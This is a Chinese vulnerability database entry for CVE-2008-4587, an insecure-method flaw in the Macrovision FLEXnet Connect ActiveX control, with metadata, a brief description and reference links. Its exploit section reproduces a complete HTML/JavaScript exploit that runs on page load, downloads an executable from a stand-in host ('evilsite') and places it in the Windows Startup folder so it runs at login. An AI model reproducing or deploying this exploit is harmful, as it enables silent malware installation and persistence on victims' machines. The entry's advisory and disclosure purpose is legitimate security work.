Macrovision FLEXnet Connect ActiveX AddFile和RunScheduledJobs方法下载漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114303 漏洞类型 其他
发布时间 2008-01-14 更新时间 2009-01-29
CVE编号 CVE-2008-4587 CNNVD-ID CNNVD-200810-282
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/4909
https://cxsecurity.com/issue/WLB-2008100051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-282
|漏洞详情
MacrovisionFLEXnetConnect是一种应用软件的厂商为用户提供产品相关的更新及信息发布的工具。没有正确地验证一些函数的输入参数,如果用户受骗访问了恶意网页的话,就可能在用户不知情的情况下向系统下载任意文件,利用AddFile和RunScheduledJobs方法.
|漏洞EXP
<!-- 
Macrovision FlexNet DownloadManager Insecure Methods Exploit
Implemented Categories:
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372
-->
<html>
 <head>
  <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
	var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");
	
	mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
	mJob.SetPriority(0);
	mJob.SetNotifyFlags(2);
	mJob.ScheduleInterval = 2;
	
	obj.RunScheduledJobs();
                
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-14]
|参考资料

来源:XF
名称:macrovision-flexnet-file-overwrite(39653)
链接:http://xforce.iss.net/xforce/xfdb/39653
来源:VUPEN
名称:ADV-2008-0145
链接:http://www.vupen.com/english/advisories/2008/0145
来源:BID
名称:27279
链接:http://www.securityfocus.com/bid/27279
来源:MILW0RM
名称:4909
链接:http://www.milw0rm.com/exploits/4909
来源:SREASON
名称:4428
链接:http://securityreason.com/securityalert/4428
来源:SECUNIA
名称:28496
链接:http://secunia.com/advisories/28496